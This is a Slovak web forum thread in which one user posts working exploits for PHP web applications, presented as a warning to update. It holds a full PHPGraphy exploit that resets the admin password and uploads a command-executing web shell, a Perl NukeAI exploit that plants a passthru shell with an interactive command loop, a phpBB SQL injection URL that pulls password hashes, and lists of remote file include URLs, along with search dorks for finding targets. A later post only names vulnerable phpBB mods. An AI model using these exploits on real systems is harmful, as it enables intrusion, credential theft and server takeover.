| | |
| Stránka: 1 z 1
| [ Príspevkov: 5 ] | |
Autor | Správa |
---|
Registrovaný: 13.07.06 Prihlásený: 22.10.07 Príspevky: 61 Témy: 5 | Napísal wire: 01.12.2006 12:19 | |
|
Kedze coraz viac a viac ludi pouziva rozne redakcne systemy a spravy fotogalerii a podobne myslim ze je na mieste poukazat aj na to, ze tieto kody maju urcite chyby.
Ak o nejakych viete pridajte info o chybe.
Pripajam zoznam takych najcerstvejsich, postupne podla toho kolko budem mat casu budem pridavat tie co najdem.
Pripominam, ze toto niesu navody ako niekoho poskodit ale navody pre ludi ktori pouzivaju dany system aby bud aktualizovali na aktualnu verziu pripadne upravili zdrojak tak aby sa dana chyba nedala vyuzit.
PHPGraphy 0.9.12 sprava fotografii
Typ: Commands Execution Exploit
Kód: <?php print_r(' --------------------------------------------------------------------------- PHPGraphy 0.9.12 Zend_Hash_Del_Key_Or_Index/privilege escalation/ /remote command execution exploit by rgod dork: intext:"This site is using phpGraphy" | intitle:"my phpgraphy site" mail: retrog@alice.it site: http://retrogod.altervista.org --------------------------------------------------------------------------- ');
/* works against register_globals=on */
if ($argc<3) { print_r(' --------------------------------------------------------------------------- Usage: php '.$argv[0].' host path cmd OPTIONS host: target server (ip/hostname) path: path to PHPGraphy Options: -p[port]: specify a port other than 80 -P[ip:port]: specify a proxy Example: php '.$argv[0].' localhost /phpgraphy/ ls -la -P1.1.1.1:80 php '.$argv[0].' localhost / cat ./data/users.dat -p81 --------------------------------------------------------------------------- '); die; } error_reporting(0); ini_set("max_execution_time",0); ini_set("default_socket_timeout",5);
function quick_dump($string) { $result='';$exa='';$cont=0; for ($i=0; $i<=strlen($string)-1; $i++) { if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) {$result.=" .";} else {$result.=" ".$string[$i];} if (strlen(dechex(ord($string[$i])))==2) {$exa.=" ".dechex(ord($string[$i]));} else {$exa.=" 0".dechex(ord($string[$i]));} $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} } return $exa."\r\n".$result; } $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet) { global $proxy, $host, $port, $html, $proxy_regex; if ($proxy=='') { $ock=fsockopen(gethostbyname($host),$port); if (!$ock) { echo 'No response from '.$host.':'.$port; die; } } else { $c = preg_match($proxy_regex,$proxy); if (!$c) { echo 'Not a valid proxy...';die; } $parts=explode(':',$proxy); echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n"; $ock=fsockopen($parts[0],$parts[1]); if (!$ock) { echo 'No response from proxy...';die; } } fputs($ock,$packet); if ($proxy=='') { $html=''; while (!feof($ock)) { $html.=fgets($ock); } } else { $html=''; while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { $html.=fread($ock,1); } } fclose($ock); }
$host=$argv[1]; $path=$argv[2]; $port=80; $proxy=""; for ($i=3; $i<$argc; $i++){ $temp=$argv[$i][0].$argv[$i][1]; if (($temp<>"-p") and ($temp<>"-P")) {$cmd.=" ".$argv[$i];} if ($temp=="-p") { $port=str_replace("-p","",$argv[$i]); } if ($temp=="-P") { $proxy=str_replace("-P","",$argv[$i]); } } if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
//reset admin password... //let's reactivate :) the *install mode* to do that //you will be able to login with user -> suntzu, password -> suntzu $data ="login=suntzu"; $data.="&password=suntzu"; $data.="&security_level=999"; //god $data.="&uid=0"; $data.="&submit=Submit"; $packet ="POST ".$p."index.php?uid=0 HTTP/1.0\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="User-Agent: Lynx/2.8.3dev.8 libwww-FM/2.14FM\r\n"; $packet.="Referer: http://".$host.$path."index.php\r\n"; $packet.="Accept-Language: en\r\n"; $packet.="Content-Type: application/x-www-form-urlencoded\r\n"; $packet.="Accept-Encoding: text/plain\r\n"; $packet.="Content-Length: ".strlen($data)."\r\n"; $packet.="Connection: Close\r\n"; $packet.="Cookie: mode=um; install_mode=1; 2095608056=1; -285023552=1; action=edit;\r\n\r\n"; $packet.=$data; sendpacketii($packet); sleep(2);
//login as admin... $data ="user=suntzu"; $data.="&pass=suntzu"; $data.="&dir="; $data.="&rememberme=on"; $data.="&startlogin=1"; $packet ="POST ".$p."index.php HTTP/1.0\r\n"; $packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n"; $packet.="Referer: http://".$host.$path."index.php\r\n"; $packet.="Accept-Language: en\r\n"; $packet.="Content-Type: application/x-www-form-urlencoded\r\n"; $packet.="User-Agent: Lynx/2.8.3dev.8 libwww-FM/2.14FM\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Content-Length: ".strlen($data)."\r\n"; $packet.="Pragma: no-cache\r\n"; $packet.="Connection: keep-alive\r\n\r\n"; $packet.=$data; sendpacketii($packet); $temp=explode("Set-Cookie: ",$html); $cookie=""; for ($i=1; $i<count($temp); $i++) { $temp2=explode(" ",$temp[$i]); $cookie.=" ".$temp2[0]; } echo "cookie -> ".$cookie."\n"; sleep(1);
//upload the *evil* shell //some tricks with "config" and "dir" to escape from the pictures/ dir, .htaccess protected //you need a writable folder, if not succeeded try some of theese paths: ./themes, ./docs, ./base //for "dir" argument, let's create a *fake* config.php in main folder $data='-----------------------------7d61bcd1f033e Content-Disposition: form-data; name="pictures[]"; filename="config.php";
<?php set_time_limit(0);error_reporting(7);echo "my_delim"; passthru($_SERVER["HTTP_CLIENT_IP"]); echo "my_delim";?> -----------------------------7d61bcd1f033e Content-Disposition: form-data; name="picupload"
1 -----------------------------7d61bcd1f033e-- '; $packet ="POST ".$p."index.php HTTP/1.0\r\n"; $packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n"; $packet.="Referer: http:/".$host.$path."index.php\r\n"; $packet.="Accept-Language: en\r\n"; $packet.="Content-Type: multipart/form-data; boundary=---------------------------7d61bcd1f033e\r\n"; $packet.="User-Agent: Lynx/2.8.3dev.8 libwww-FM/2.14FM\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Content-Length: ".strlen($data)."\r\n"; $packet.="Pragma: no-cache\r\n"; $packet.="Cookie: config=; -578819025=1; -747504677=1; dir=.; 2087386682=1; 2090185412=1; ".$cookie."\r\n"; $packet.="Connection: keep-alive\r\n\r\n"; $packet.=$data; sendpacketii($packet); sleep(1);
//launch commands... $packet ="GET ".$p."config.php HTTP/1.0\r\n"; $packet.="CLIENT-IP: ".$cmd."\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Connection: Close\r\n\r\n"; sendpacketii($packet); if (eregi("my_delim",$html)){ $temp=explode("my_delim",$html); echo $temp[1]; } else { echo "exploit failed..."; } ?>
|
|
Registrovaný: 13.07.06 Prihlásený: 22.10.07 Príspevky: 61 Témy: 5 | Napísal autor témy wire: 01.12.2006 12:21 | |
|
PHP-Nuke NukeAI Module 3b ( util.php )
Typ: Remote File Include Exploit
Kód: #!/usr/bin/perl # +------------------------------------------------------------------------------------------- # + nukeai beta3 (util.php) Remote Code Execution Vulnerability # +------------------------------------------------------------------------------------------- # + Affected Software .: nukeai beta3 # + Download ..........: http://mesh.dl.sourceforge.net/sourceforge/nukeai/nukeai_beta3.zip # + Dork ..............: "nukeai beta3" # + Class .............: Remote Code Execution # + Risk ..............: High (Remote Code Execution) # + Found By ..........: DeltahackingTEAM Code :Dr.Trojan&Dr.Pantagon # + Exploit:http://[target]/[path]/modules/NukeAI/util.php?AIbasedir=http:// # +------------------------------------------------------------------------------------------- # + Details: # + nukeai beta3 Download by default installation doesn't prevent any of the files in the # + modules/NukeAI directory from being accessed by a client. The modules/NukeAI # + file takes input passed to the script by util.php and writes it to $_POST["filename"].0 # + unsanatized in the modules/NukeAI descriptions directory. # + # + Vulnerable Code: # +require_once $AIbasedir."/NukeAI/util.php"; # +------------------------------------------------------------------------------------------- # Example: http://[site]/modules/NukeAI/util.php?AIbasedir=[php shell]
use Getopt::Long; use URI::Escape; use IO::Socket;
$code = "<?php passthru(\$_GET[cmd]); ?>";
main();
sub usage { print "DeltahackingSecurityTEAM\n"; print "www.deltahacking.net\n"; print "Dr.Trojan,HIV++,D_7j,Lord,VPc,IMpostor,Dr.Pantagon\n"; print " http://advistory.deltahacking.net((we Bug))\n"; print "\nukeai beta3 Remote Code Execution Exploit\n"; print "-h, --host\ttarget host\t(example.com)\n"; print "-f, --file\tshell file\t(shell.php)\n"; print "-d, --dir\tinstall dir\t(/NukeAI)\n"; print "============================================================================farzad.sharifi\r\n"; exit; }
sub main { GetOptions ('h|host=s' => \$host,'f|file=s' => \$file,'d|dir=s' => \$dir); usage() unless $host;
$dir = "/NukeAI" unless $dir; $file = "shell.php" unless $file; uri_escape($cmd); $sock = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$host",PeerPort=>"80") or die "\nconnect() failed.\n";
print "\nconnected to ".$host.", sending data.\n"; $sendurl = "description=0&moreinfo=".$code."&accesses=0&filename=".$file."&date=&B1=Submit"; $sendlen = length($sendurl); print $sock "POST ".$dir."NukeAI/util.php?AIbasedir= HTTP/1.1\n"; print $sock "Host: ".$host."\n"; print $sock "Connection: close\n"; print $sock "Content-Type: application/x-www-form-urlencoded\n"; print $sock "Content-Length: ".$sendlen."\n\n"; print $sock $sendurl; print "attempted to create php shell, server response:\n\n"; while($recvd = <$sock>) { print " ".$recvd.""; }
while($cmd !~ "~quit") { print "\n\n-> "; $cmd = <STDIN>; if ($cmd !~ "~quit") { $sock = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$host",PeerPort=>"80") or die "connect() failed.\n"; $sendurl = uri_escape($cmd);
print $sock "GET ".$dir."/descriptions/".$file.".0?cmd=".$sendurl." HTTP/1.1\n"; print $sock "Host: ".$host."\n"; print $sock "Accept: */*\n"; print $sock "Connection: close\n\n"; print "\n";
while($recvd = <$sock>) { print $recvd; } } } exit; }
|
|
Registrovaný: 13.07.06 Prihlásený: 22.10.07 Príspevky: 61 Témy: 5 | Napísal autor témy wire: 01.12.2006 12:25 | |
|
phpBB
Typ: Remote SQL Injection Vulnerability
Kód: http://[Target]/[Path]/admin/admin_hacks_list.php?mode=edit&hack_id=-99%20UNION%20SELECT%20null,null,user_password,null,null,null,null,null,null,null,null,null%20FROM%20phpbb_users%20Where%20user_id=2&sid=AdminHash
|
|
Registrovaný: 13.07.06 Prihlásený: 22.10.07 Príspevky: 61 Témy: 5 | Napísal autor témy wire: 01.12.2006 12:27 | |
|
Fully Modded phpBB
Typ: Multiple File Include Vulnerabilities
Kód: ############################################################## Fully Modded phpBB 2 Remote File Include [PHPBB] Exploit (2)
##############################################################
Source Code: http://phpbbfm.net/support/index_fm.php http://kent.dl.sourceforge.net/sourceforge/phpbbfm/FM2021-4-40.tar.gz ###################################################
Vulnerable Code:_ include('includes/common.php'); $phpbb_root_path = $foing_root_path . $phpbb_root_path; In ./faq.php ./index.php ./list.php ./login.php ./playlist.php ./song.php ./gen_m3u.php ./view_artist.php ./view_song.php ./flash/set_na.php ./flash/initialise.php ./flash/get_song.php ./includes/common.php ./admin/nav.php ./admin/main.php ./admin/list_artists.php ./admin/index.php ./admin/genres.php ./admin/edit_artist.php ./admin/edit_album.php ./admin/config.php ./admin/admin_status.php
###################################################
Exploit : http://www.vicTim.com/[player]/faq.php?foing_root_path=sh3ll.txt? http://www.vicTim.com/[player]/index.php?foing_root_path=sh3ll.txt? http://www.vicTim.com/[player]/list.php?foing_root_path=sh3ll.txt? http://www.vicTim.com/[player]/login.php?foing_root_path=sh3ll.txt? http://www.vicTim.com/[player]/playlist.php?foing_root_path=sh3ll.txt? http://www.vicTim.com/[player]/song.php?foing_root_path=sh3ll.txt? http://www.vicTim.com/[player]/gen_m3u.php?foing_root_path=sh3ll.txt? http://www.vicTim.com/[player]/view_artist.php?foing_root_path=sh3ll.txt? http://www.vicTim.com/[player]/view_song.php?foing_root_path=sh3ll.txt? http://www.vicTim.com/[player]/login.php?foing_root_path=sh3ll.txt? http://www.vicTim.com/[player]/playlist.php?foing_root_path=sh3ll.txt? http://www.vicTim.com/[player]/song.php?foing_root_path=sh3ll.txt? http://www.vicTim.com/[player]/flash/set_na.php?foing_root_path=sh3ll.txt? http://www.vicTim.com/[player]/flash/initialise.php?foing_root_path=sh3ll.txt? http://www.vicTim.com/[player]/flash/get_song.php?foing_root_path=sh3ll.txt? http://www.vicTim.com/[player]/includes/common.php?foing_root_path=sh3ll.txt? http://www.vicTim.com/[player]/admin/nav.php?foing_root_path=sh3ll.txt? http://www.vicTim.com/[player]/admin/main.php?foing_root_path=sh3ll.txt? http://www.vicTim.com/[player]/admin/list_artists.php?foing_root_path=sh3ll.txt? http://www.vicTim.com/[player]/admin/index.php?foing_root_path=sh3ll.txt? http://www.vicTim.com/[player]/admin/genres.php?foing_root_path=sh3ll.txt? http://www.vicTim.com/[player]/admin/edit_artist.php?foing_root_path=sh3ll.txt? http://www.vicTim.com/[player]/admin/edit_album.php?foing_root_path=sh3ll.txt? http://www.vicTim.com/[player]/admin/config.php?foing_root_path=sh3ll.txt? http://www.vicTim.com/[player]/admin/admin_status.php?foing_root_path=sh3ll.txt? ###################################################
Discoverd By : 020 ###################################################
Special Greetings :_ Tryag-Team & 4lKaSrGoLd3n-Team > WwW.DwRaT.CoM & WwW.Tryag.CoM & WwW.Xp020.CoM ###################################################
|
|
Registrovaný: 01.05.05 Príspevky: 13348 Témy: 1496 Bydlisko: Bratislava | Napísal JanoF: 03.02.2007 13:20 | |
|
Malý zozam modifikácií na phpBB, cez ktoré sa dá nabúrať fórum.
Tieto modifikácie si na fórum neinštalujte, stane sa tak zranitelným.
phpRaid: File Inclusion Vulnerability
pafileDB: File Inclusion Vulnerability
Auction: File Inclusion Vulnerability
Knowledge Base Mod: SQL-Injection
Advanced GuestBook: File Inclusion Vulnerability
TopList: File Inclusion Vulnerability
Backup sql Mod: File Inclusion Vulnerability
Activity MOD Plus: File Inclusion Vulnerability
hacks_list: File Inclusion Vulnerability
Topic Calendar: XSS
LDMan Pro: sql injection
Calendar Pro: sql injection
Datenbank mod: Remote File Vulnerability
Smilies Album 1.1.0: XSS Vulnerability
THoRCMS: Remote File Vulnerability
Blend Portal: Remote File Vulnerability
All Topics Hack: Sql injection
User Class Mod: Sql injection
Most Used Languages Module: Sql injection
mail2forum: File Inclusion Vulnerability
Cracker Tracker Professional: DoS Flooder
Personal Notes: Xss Vulnerability
Cracker Tracker Professional: Xss Vulnerability
Calendar Lite: Xss Vulnerability
All Topics Mod: SQL Injection
PhpBB Album mod: File Inclusion Vulnerability
phpBB Shadow Premod: File Inclusion Vulnerability
Security Suite Mod 1.0.0: File Inclusion Vulnerability
Admin Topic Action Logging Mod: File Inclusion Vulnerability
User Viewed Posts Tracker: File Inclusion Vulnerability
Random User Registrationr: File Inclusion Vulnerability
Amazonia Mod: File Inclusion Vulnerability
News Defilante Horizontal: File Inclusion Vulnerability
lat2cyr Mod 1.0.1: File Inclusion Vulnerability
SpamOborona Mod: File Inclusion Vulnerability
RPG Events 1.0: File Inclusion Vulnerability
SearchIndexer Mod: File Inclusion Vulnerability
Prillian French Mod: File Inclusion Vulnerability
ACP User Registration Mod 1.0: File Inclusion Vulnerability
Security: File Inclusion Vulnerability
Journals System Mod 1.0.2: File Inclusion Vulnerability
Insert User Mod: File Inclusion Vulnerability
Import Tools Mod: File Inclusion Vulnerability
Ajax Shoutbox: File Inclusion Vulnerability
SpamBlocker Mod: File Inclusion Vulnerability
_________________ Streacom DA2 | SilverStone Titanium SX800-LTI 800W | ASRock X299E-ITX/ac | Intel Core i9-9980XE & be quiet! Dark Rock TF | Kingston HyperX Impact 64 GB DDR4 2666 MHz | NVIDIA Titan RTX 24 GB | Intel SSD Optane 905P 480 GB NVMe U.2 & Intel SSD 750 1,2 TB NVMe U.2 & Intel SSD 660p 2 TB NVMe M.2 & Seagate BackUp Plus Portable 56 TB USB | 55" 4K OLED Dell Alienware AW5520QF & 24" LCD EIZO FlexScan EV2451 | Ergotron LX Wall Mount Keyboard Arm | Logitech Craft | Logitech G603 | Logitech F710 | Harman Kardon Sabre SB 35 & Sennheiser RS 175 | Microsoft Windows 7 Ultimate | APC Back-UPS ES 700 | Lenovo ThinkPad X250 | iPhone X 256 GB & Pitaka Aramid | SilverStone ML05B Milo | Corsair SF600 SFX 600W | ASRock X99E-ITX/ac | Intel Xeon E5-2683 v4 & NOCTUA NH-L12S | Kingston HyperX Savage 32 GB DDR4 2400 MHz | NVIDIA GeForce GT 710 1 GB | Intel SSD Optane Memory 32 GB NVMe M.2 & Intel SSD 730 240 GB SATA | Ubuntu Server |
|
| Stránka: 1 z 1
| [ Príspevkov: 5 ] | |
| Nemôžete zakladať nové témy v tomto fóre Nemôžete odpovedať na témy v tomto fóre Nemôžete upravovať svoje príspevky v tomto fóre Nemôžete mazať svoje príspevky v tomto fóre
|
|